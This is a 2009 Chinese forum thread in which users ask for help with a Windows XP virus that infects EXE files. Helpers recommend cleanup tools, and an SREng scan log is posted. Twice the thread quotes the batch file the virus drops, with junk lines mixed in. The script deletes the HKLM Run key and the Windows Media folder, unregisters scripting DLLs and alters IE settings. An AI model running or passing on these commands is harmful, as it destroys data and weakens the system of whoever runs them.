我的电脑的所有的EXE文件不定时的会产生一个mdf文件，删除后，不知道怎么就会又跑出来，而且新下的软件也会很快中招，卡卡查不到。瑞星也都查不到。他会损坏exe文件，你只要运行exe文件，这个文件立刻就要访问网络，同时会跳出来文件篡改注册表，它会感染同一目录下的所有EXE文件！生成同文件名的.mdf文件！运行被感染的EXE文件无法打开，此时病毒已经运行，篡改注册表，注册病毒自身DLL文件！通过FTP.exe下载网络病毒！只要一连网就会发作！怎么都清楚不了！
C:\Documents and Settings\All Users\「开始」菜单\程序\启动里面出现乱码的exe文件，要开机启动
点击之后，任务管理器无法运行
点击后，出现个批处理文件
smgxipcfdztsmgxipcfdzt
regsvr32.exe /u /s shimgvw.dll
dplqiamzqhlykkxwzhnhzlee
regsvr32.exe /u /s itss.dll
fjrajsxbepunarkyeyo
regsvr32.exe /u /s scrrun.dll
qlwtkliuaxwixzwcthxjd
regsvr32.exe /s jscript.dll
afjmldtwefddeogqrrfmdp
regsvr32.exe /u /s vbscript.dll
czpwlwdpcngjoenbflvawbsr
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v

Play_Background_Sounds /t REG_SZ /d no /F
nbupmoorqvyeufzfyfxyeqicbxq
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v

"Display Inline Videos" /t REG_SZ /d no /F
xwzhnhzleekhghdwnndfu
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v

Play_Animations /t REG_SZ /d no /F
aymanzsmamiwgpyakbnsbnk
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v

DisableScriptDebuggerIE /t REG_SZ /d yes /F
ksslgscgmhbuympgo
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v

"Disable Script Debugger" /t REG_SZ /d yes /F
uuxdhknhccsgrqcevdvt
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v

"Display Inline Images" /t REG_SZ /d yes /F
xokwicybqkktvsiwadosuayryfpxc
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
hrqginidesajeyptxlbdbnl
del C:\WINDOWS\Media\*.* /Q
slvzjftwsaudixagaulcqcpyt
del %0
unarkyeyocjhkrchdeuu
exit
ehoclqprcqeuhsauobeinz


这些MDF文件大小都是32K，可是我手工搜索删除后马上就会生成其它的。

声明：我用的正版瑞星2009 且已升级到昨天21。52。44 

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

下载最新版本的SRENG工具：http://www.kztechs.com/sreng/download.html
操作方法可以看这贴2楼：http://bbs.ikaka.com/showtopic-8442813.aspx

下载后首先不要运行先将下载的SREngLdr.EXE重命名为SREng.com(SREng.scr\SREng.bat\SREng.pif)运行.
扫描日志传上来

ftp://ftp.drweb.com/pub/drweb/cureit/launch.exe

记得
开始后要立即中止杀毒
这个程序，默认的是快速扫描

你选中止之后，选择全面扫描再扫描

该病毒为修改了注册表的关联导致你在运行exe文件的时候指向了mdf文件，只要你运行了一次之后就执行了一次病毒本体文件，解决方法是修改注册表的关联HKEY_CLASSES_ROOT 这里找到.exe文件关联，进行修复。将附件中的解压并运行，导入注册表。后运行杀毒软件进行清毒。


如果以上方法无效只能键入winpe系统进行病毒查杀。具体看这个里
用WinPE引导杀毒，在PE环境下进行全盘扫描。
具体PE的下载地址及使用，请参考此贴http://bbs.ikaka.com/showtopic-8561485.aspx#9078325

真晕，刚才还上不了网了！

扫描结果，麻烦两位大侠看看

[CODE]

2009-08-22,16:26:29

System Repair Engineer 2.7.1.1261
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 3 (Build 2600) - 管理权限用户 - 完整功能

以下内容被选中：
    所有的启动项目（包括注册表、启动文件夹、服务等）
    浏览器加载项
    正在运行的进程（包括进程模块信息）
    文件关联
    Winsock 提供者
    Autorun.inf
    HOSTS 文件
    进程特权扫描
    计划任务
    API HOOK
    隐藏进程


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Component Publisher]
    <IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}><"C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020>  [File is missing]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><>  [N/A]
    <run><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <NvCplDaemon><RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <nwiz><nwiz.exe /install>  [(Verified)NVIDIA Corporation]
    <NvMediaCenter><RUNDLL32.EXE C:\WINDOWS\system32\NVMCTRAY.DLL,NvTaskbarInit>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <SmartAudio><C:\Program Files\CONEXANT\SMARTAUDIO\SMAUDIO.EXE /c>  [(Verified)"Conexant Systems, Inc."]
    <TmlCMode><C:\Program Files\Compal\TmlCMode\TmlCMode.exe>  [Compal Electronic Inc.]
    <EnergyUtility><C:\Program Files\Lenovo\Energy Management\utilty.exe>  [Lenovo(Beijing)Limited]
    <Energy Management><C:\Program Files\Lenovo\Energy Management\Energy Management.exe>  [Lenovo (Beijing) Limited]
    <IMSCMig><C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload>  [(Verified)Microsoft Corporation]
    <Gemplus Reader Resource Manager><C:\Program Files\Gemplus\GemSafe Libraries\BIN\RRMSVR.exe>  [Gemplus]
    <RegTool><C:\Program Files\Gemplus\GemSafe Libraries\BIN\RegTool.exe>  []
    <gemstrmw><C:\WINDOWS\system32\gemstrmw.exe /r>  [Gemplus]
    <runeip><"C:\Program Files\Rising\AntiSpyware\rstray.exe" /startup>  [(Verified)Beijing Rising Information Technology Corporation Limited]
    <ms08_067_patch><"C:\WINDOWS\system32\nap32.exe" /run>  [Beijing Rising Information Technology Co., Ltd.]
    <NeroFilterCheck><C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe>  [(Verified)Nero AG]
    <NBKeyScan><"C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe">  [(Verified)Nero AG]
    <RisTray><"C:\Program Files\Rising\Ris\RsTray.exe" -system>  [(Verified)Beijing Rising Information Technology Corporation Limited]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Windows Component Publisher]
    <Userinit><C:\WINDOWS\system32\userinit.exe,>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><kmon.dll>  [(Verified)Beijing Rising Information Technology Corporation Limited]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{AEB6717E-7E19-11d0-97EE-00C04FD91972}><shell32.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
    <PostBootReminder><%SystemRoot%\system32\SHELL32.dll>  [(Verified)Microsoft Windows Component Publisher]
    <CDBurn><%SystemRoot%\system32\SHELL32.dll>  [(Verified)Microsoft Windows Component Publisher]
    <WebCheck><%SystemRoot%\system32\webcheck.dll>  [(Verified)Microsoft Windows Component Publisher]
    <SysTray><C:\WINDOWS\system32\stobject.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
    <WinlogonNotify: crypt32chain><crypt32.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]
    <WinlogonNotify: cryptnet><cryptnet.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]
    <WinlogonNotify: cscdll><cscdll.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\dimsntfy]
    <WinlogonNotify: dimsntfy><%SystemRoot%\System32\dimsntfy.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]
    <WinlogonNotify: ScCertProp><wlnotify.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]
    <WinlogonNotify: Schedule><wlnotify.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]
    <WinlogonNotify: sclgntfy><sclgntfy.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]
    <WinlogonNotify: SensLogn><WlNotify.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]
    <WinlogonNotify: termsrv><wlnotify.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]
    <WinlogonNotify: wlballoon><wlnotify.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler]
    <{438755C2-A8BA-11D1-B96B-00A0C90312E1}><%SystemRoot%\system32\browseui.dll>  [(Verified)Microsoft Windows Component Publisher]
    <{8C7461EF-2B13-11d2-BE35-3078302C2030}><%SystemRoot%\system32\browseui.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
    <Microsoft Windows Media Player><C:\WINDOWS\inf\unregmp2.exe /ShowWMP>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
    <Internet Explorer><%systemroot%\system32\shmgrate.exe OCInstallUserConfigIE>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
    <浏览器自定义组件><RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
    <Outlook Express><%systemroot%\system32\shmgrate.exe OCInstallUserConfigOE>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
    <Themes Setup><%SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
    <Microsoft Outlook Express 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
    <Microsoft Windows Media Player><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp.inf,PerUserStub>  []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
    <通讯簿 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
    <Windows 桌面更新><regsvr32.exe /s /n /i:U shell32.dll>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
    <Internet Explorer 6><%SystemRoot%\system32\ie4uinit.exe>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
    <N/A><C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install>  [Microsoft Corporation]
[HKEY_CURRENT_USER\Control Panel\Desktop]
    <SCRNSAVE.EXE><C:\WINDOWS\system32\ssmypics.scr>  [(Verified)Microsoft Windows Component Publisher]

==================================
启动文件夹
[蓝牙控制盘]
  <C:\Documents and Settings\All Users\「开始」菜单\程序\启动\蓝牙控制盘.lnk --> C:\PROGRA~1\Lenovo\BLUETO~1\BTTray.exe [Broadcom Corporation.]><N>

==================================
服务
[Autodesk Licensing Service / Autodesk Licensing Service][Stopped/Manual Start]
  <"C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe"><Autodesk>
[Bluetooth Service / btwdins][Running/Auto Start]
  <C:\Program Files\Lenovo\Bluetooth Software\bin\btwdins.exe><Broadcom Corporation.>
[Contrl Center of Storm Media / ccosm][Stopped/Manual Start]
  <C:\Program Files\StormII\stormliv.exe /asservice><北京暴风网际科技有限公司>
[Desklop Sharing / Desktopf][Stopped/Auto Start]
  <C:\Program Files\Movie Maker\Reer.exe><N/A>
[ICBC Daemon Service / ICBC Daemon Service][Stopped/Auto Start]
  <C:\Program Files\ICBCEbankTools\ICBCAntiPhishing\IcbcDaemon.exe><N/A>
[InstallDriver Table Manager / IDriverT][Stopped/Manual Start]
  <"C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe"><Macrovision Corporation>
[Nero BackItUp Scheduler 3 / Nero BackItUp Scheduler 3][Running/Auto Start]
  <C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe><Nero AG>
[NMIndexingService / NMIndexingService][Running/Manual Start]
  <"C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe"><Nero AG>
[NVIDIA Display Driver Service / NVSvc][Running/Auto Start]
  <C:\WINDOWS\system32\nvsvc32.exe><NVIDIA Corporation>
[O2Micro Flash Memory Card Service / o2flash][Running/Auto Start]
  <"C:\Program Files\O2Micro Flash Memory Card Driver\o2flash.exe"><O2Micro International>
[PLFlash DeviceIoControl Service / PLFlash DeviceIoControl Service][Running/Auto Start]
  <C:\WINDOWS\system32\IoctlSvc.exe><Prolific Technology Inc.>
[Ris Process Communication Center / RisCCenter][Stopped/Auto Start]
  <C:\Program Files\Rising\Ris\CCENTER.EXE><Beijing Rising Information Technology Co., Ltd.>
[Rising RisTask Manager / RisTask][Running/Auto Start]
  <"C:\Program Files\Rising\Ris\RavTask.exe" RisTask><Beijing Rising Information Technology Co., Ltd.>
[Rising RealTime Monitor / RsRavMon][Stopped/Auto Start]
  <C:\Program Files\Rising\Ris\RavMonD.exe><Beijing Rising Information Technology Co., Ltd.>
[Rising Scan Service / RsScanSrv][Stopped/Auto Start]
  <C:\Program Files\Rising\Ris\ScanFrm.exe><Beijing Rising Information Technology Co., Ltd.>

==================================
驱动程序
[Lenovo Virtual Power Controller Driver / ACPIVPC][Running/Manual Start]
  <system32\DRIVERS\AcpiVpc.sys><Lenovo Corporation>
[Broadcom NetXtreme Gigabit Ethernet / b57w2k][Running/Manual Start]
  <system32\DRIVERS\b57xp32.sys><Broadcom Corporation>
[Broadcom 802.11 网络适配器驱动程序 / BCM43XX][Stopped/Manual Start]
  <system32\DRIVERS\bcmwl5.sys><Broadcom Corporation>
[蓝牙音频设备 / btaudio][Stopped/Manual Start]
  <system32\drivers\btaudio.sys><Broadcom Corporation.>
[蓝牙虚拟通信驱动程序 / BTDriver][Running/Manual Start]
  <system32\DRIVERS\btport.sys><Broadcom Corporation.>
[蓝牙总线枚举器 / BTKRNL][Running/Manual Start]
  <system32\DRIVERS\btkrnl.sys><Broadcom Corporation.>
[蓝牙局域网接入服务器 / BTWDNDIS][Stopped/Manual Start]
  <system32\DRIVERS\btwdndis.sys><Broadcom Corporation.>
[WIDCOMM USB Bluetooth Driver / BTWUSB][Stopped/Manual Start]
  <System32\Drivers\btwusb.sys><Broadcom Corporation.>
[Conexant UAA Function Driver for High Definition Audio Service / CnxtHdAudService][Running/Manual Start]
  <system32\drivers\CHDAU32.sys><Conexant Systems Inc.>
[COMPAL Embedded System Control / EMSC][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\EMSC.SYS><N/A>
[Microsoft 用于 High Definition Audio 的 UAA 总线驱动程序 / HDAudBus][Running/Manual Start]
  <system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[hookcont / hookcont][Running/System Start]
  <system32\drivers\HookCont.sys><Beijing Rising Information Technology Co., Ltd.>
[hooksys / hooksys][Running/System Start]
  <system32\drivers\HookSys.sys><Beijing Rising Information Technology Co., Ltd.>
[HSFHWAZL / HSFHWAZL][Running/Manual Start]
  <system32\DRIVERS\HSFHWAZL.sys><Conexant Systems, Inc.>
[HSF_DPV / HSF_DPV][Running/Manual Start]
  <system32\DRIVERS\HSF_DPV.sys><Conexant Systems, Inc.>
[mdmxsdk / mdmxsdk][Running/Auto Start]
  <system32\DRIVERS\mdmxsdk.sys><Conexant>
[nv / nv][Running/Manual Start]
  <system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[Service for NVIDIA High Definition Audio Driver / NVHDA][Running/Manual Start]
  <system32\drivers\nvhda32.sys><NVIDIA Corporation>
[O2MDRDR / O2MDRDR][Running/Manual Start]
  <system32\DRIVERS\o2media.sys><O2Micro>
[O2SDRDR / O2SDRDR][Running/Manual Start]
  <system32\DRIVERS\o2sd.sys><O2Micro>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Rising RfwBase Driver / RfwBase9][Running/Manual Start]
  <system32\DRIVERS\rfwbase.sys><Beijing Rising Information Technology Co., Ltd.>
[rfwtdi / rfwtdi][Running/Auto Start]
  <\??\C:\Program Files\Rising\Ris\rfwtdi.sys><Beijing Rising Information Technol

==================================
文件关联
.TXT  Error. [C:\WINDOWS\notepad.exe %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  Error. [AutoCADScriptFile]
.CHM  Error. ["hh.exe" %1]
.HLP  OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1      localhost

==================================
进程特权扫描
特殊特权被允许： SeLoadDriverPrivilege [PID = 1020, C:\WINDOWS\SYSTEM32\WINLOGON.EXE]
特殊特权被允许： SeLoadDriverPrivilege [PID = 2596, C:\PROGRAM FILES\COMPAL\TMLCMODE\TMLCMODE.EXE]
特殊特权被允许： SeLoadDriverPrivilege [PID = 1976, C:\PROGRAM FILES\LENOVO\ENERGY MANAGEMENT\UTILTY.EXE]
特殊特权被允许： SeLoadDriverPrivilege [PID = 1996, C:\PROGRAM FILES\LENOVO\ENERGY MANAGEMENT\ENERGY MANAGEMENT.EXE]
特殊特权被允许： SeLoadDriverPrivilege [PID = 1456, C:\PROGRAM FILES\GEMPLUS\GEMSAFE LIBRARIES\BIN\RRMSVR.EXE]
特殊特权被允许： SeLoadDriverPrivilege [PID = 2624, C:\PROGRAM FILES\THUNDER NETWORK\THUNDER\PROGRAM\THUNDER5.EXE]
特殊特权被允许： SeLoadDriverPrivilege [PID = 2548, C:\TDDOWNLOAD\SRENG2\SRENGLDR.COM]

==================================
计划任务
N/A

==================================
API HOOK
入口点错误：NtCreateFile (危险等级: 高,  被下面模块所HOOK: 0x003C5885)
入口点错误：NtCreateKey (危险等级: 高,  被下面模块所HOOK: 0x003C5A25)
入口点错误：NtLoadDriver (危险等级: 高,  被下面模块所HOOK: 0x003C6175)
入口点错误：NtSetValueKey (危险等级: 高,  被下面模块所HOOK: 0x003C5AF5)
入口点错误：NtWriteFile (危险等级: 高,  被下面模块所HOOK: 0x003C5955)
入口点错误：ZwCreateFile (危险等级: 高,  被下面模块所HOOK: 0x003C5885)
入口点错误：ZwCreateKey (危险等级: 高,  被下面模块所HOOK: 0x003C5A25)
入口点错误：ZwSetValueKey (危险等级: 高,  被下面模块所HOOK: 0x003C5AF5)
入口点错误：ZwWriteFile (危险等级: 高,  被下面模块所HOOK: 0x003C5955)
入口点错误：CreateServiceA (危险等级: 高,  被下面模块所HOOK: 0x003C5E35)
入口点错误：CreateServiceW (危险等级: 高,  被下面模块所HOOK: 0x003C5F05)
入口点错误：LoadLibraryA (危险等级: 高,  被下面模块所HOOK: 0x003C6B35)
入口点错误：LoadLibraryExW (危险等级: 高,  被下面模块所HOOK: 0x003C571D)
入口点错误：CreateFileW (危险等级: 高,  被下面模块所HOOK: 0x003C6655)
入口点错误：CreateProcessA (危险等级: 高,  被下面模块所HOOK: 0x003C6A65)
入口点错误：CreateProcessW (危险等级: 高,  被下面模块所HOOK: 0x003C68C5)

==================================
隐藏进程
N/A

========================

正在运行的进程 

你可以点击右下角的回复，以附件的方式上传LOG

大蜘蛛用了没

以上办法都试了，根本没有用。所有查杀工具都报正常。我重新GHOST都不行。郁闷死了。。。。。。。。。。。。。

昨天一台机子问题没解决，今天又一台。 瑞星  卡卡无任何提示，突然关闭。XP系统进程管理器不能打开，在C盘成生J782P6412RKB.BAT文件，内容附后。出现异常进程。那位帮帮我。

lxsragylcthlxsragylcth
regsvr32.exe /u /s scrrun.dll
wrxjayjnqbriupqgtbxxvyey
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
ytcubrugejvpulcwbef
del C:\WINDOWS\Media\*.* /Q
inqmcjfisrbahsynnznyr
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
tpvfdupcxppxwedwqukefu
regsvr32.exe /u /s msvidctl.dll
vkaydmaduilbzqhteibsyhcb
gmgiwelxqqdwwksyirrqvfotddi
regsvr32.exe /u /s itss.dll
qgtbxxvyeydrsbnmktdiz
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
baytxpgssgnoiiatdklpgem
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
dceeyirufjvnqcmlg
regsvr32.exe /u /s vbscript.dll
nwjwzacntwxykboxntrz
regsvr32.exe /s jscript.dll
yzwpatuppeplffipkphksoeralhzi
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
atcaalfidmttqrhktrsfhfv
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
lvhsbeqkruavsqcrtebywckdl
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
vpulcwbefvlsdbavjeoa
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
xrzvvglftlkmadungrboft
del %0
del %0
ilfovzwzptcrhsrxmvxdigbp
exit


用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)